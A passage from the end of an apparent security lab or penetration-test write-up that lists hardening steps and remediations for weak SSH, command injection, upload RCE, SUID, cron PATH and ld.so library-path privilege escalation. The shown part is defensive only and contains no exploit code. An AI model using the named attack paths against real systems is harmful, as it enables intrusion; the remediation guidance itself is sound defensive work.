<p><strong>Layer 2: Remove SUID bit</strong>
<div class="highlight"><pre><span></span><code>chmod<span class="w"> </span>-s<span class="w"> </span>/usr/sbin/testingapp
</code></pre></div></p>
<p><strong>Layer 3: Make library directories read-only</strong>
<div class="highlight"><pre><span></span><code>chmod<span class="w"> </span><span class="m">555</span><span class="w"> </span>/home/developer/libs
</code></pre></div></p>
<p><strong>Layer 4: Force RPATH (static library path)</strong>
<div class="highlight"><pre><span></span><code><span class="c1"># When compiling, use -Wl,-rpath:</span>
gcc<span class="w"> </span>-o<span class="w"> </span>testingapp<span class="w"> </span>testingapp.c<span class="w"> </span>-lcustomapp<span class="w"> </span>-Wl,-rpath<span class="o">=</span>/usr/local/lib/secure
<span class="c1"># Binary looks ONLY in /usr/local/lib/secure</span>
<span class="c1"># Ignores LD_LIBRARY_PATH and /etc/ld.so.conf.d/</span>
</code></pre></div></p>
<h2 id="5-how-to-fix-it-defense-strategies">5. How to Fix It – Defense Strategies<a class="headerlink" href="#5-how-to-fix-it-defense-strategies" title="Permanent link">&para;</a></h2>
<h3 id="51-fix-priorities">5.1 Fix Priorities<a class="headerlink" href="#51-fix-priorities" title="Permanent link">&para;</a></h3>
<table>
<thead>
<tr>
<th>Vulnerability</th>
<th>Severity</th>
<th>Primary Remediation</th>
<th>Impl. Time</th>
<th>Effort</th>
<th>Testing</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1 (Weak SSH)</td>
<td>CRITICAL</td>
<td>SSH key-based + strong policy</td>
<td>2 hrs</td>
<td>LOW</td>
<td><code>ssh-keygen -t ed25519</code></td>
</tr>
<tr>
<td>3.2 (Cmd Inject)</td>
<td>CRITICAL</td>
<td>Sanitize input + use whitelist</td>
<td>4 hrs</td>
<td>MEDIUM</td>
<td><code>escapeshellarg()</code> test</td>
</tr>
<tr>
<td>3.3 (Upload RCE)</td>
<td>CRITICAL</td>
<td>Magic bytes + disable PHP in upload dir</td>
<td>3 hrs</td>
<td>MEDIUM</td>
<td>File upload test</td>
</tr>
<tr>
<td>4.1 (SUID hping3)</td>
<td>HIGH</td>
<td>Remove SUID bit</td>
<td>15 min</td>
<td>LOW</td>
<td><code>find / -perm -4000</code></td>
</tr>
<tr>
<td>4.2 (Cronjob)</td>
<td>HIGH</td>
<td>Absolute paths + restrictive PATH</td>
<td>1 hr</td>
<td>MEDIUM</td>
<td>Monitor cron execution</td>
</tr>
<tr>
<td>4.3 (ld.so)</td>
<td>HIGH</td>
<td>Remove unsafe ld.so.conf.d entries</td>
<td>30 min</td>
<td>LOW</td>
<td>Verify ld.so.conf.d</td>
</tr>
</tbody>
</table>
<h3 id="52-the-defense-strategy">5.2 The Defense Strategy<a class="headerlink" href="#52-the-defense-strategy" title="Permanent link">&para;</a></h3>
<p><strong>To Do Immediately (Fix Web Vulnerabilities):</strong>
1. Do not use dangerous functions like <code>shell_exec()</code> without sanitizing
2. If absolutely necessary, whitelist only safe characters (letters, numbers, wildcard <code>*</code>)
3. File uploads: check magic bytes, not just extension
4. Disable PHP in <code>/images/</code> with <code>.htaccess</code> (Apache) or nginx config</p>
<p><strong>Next (Eliminate Privilege Escalation):</strong>
5. Remove SUID from unnecessary binaries
6. SSH: use only key-based auth, password disabled
7. Cronjob: always absolute path, never relative
8. LD.SO: audit <code>/etc/ld.so.conf.d/</code>, remove user-writable paths
9. Monthly check of SUID binaries with <code>find / -perm -4000</code></p>
<p><strong>Ongoing (Monitoring):</strong>
10. Scan web input periodically
11. Audit file permissions (monthly)
12. Log analysis for unauthorized access</p>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      
      <script id="__config" type="application/json">{"annotate": null, "base": "..", "features": ["navigation.tracking", "navigation.tabs", "navigation.tabs.sticky", "toc.follow", "content.code.copy", "content.code.select", "search.suggest", "search.highlight"], "search": "../assets/javascripts/workers/search.2c215733.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../assets/javascripts/bundle.79ae519e.min.js"></script>
      
    
  </body>
</html>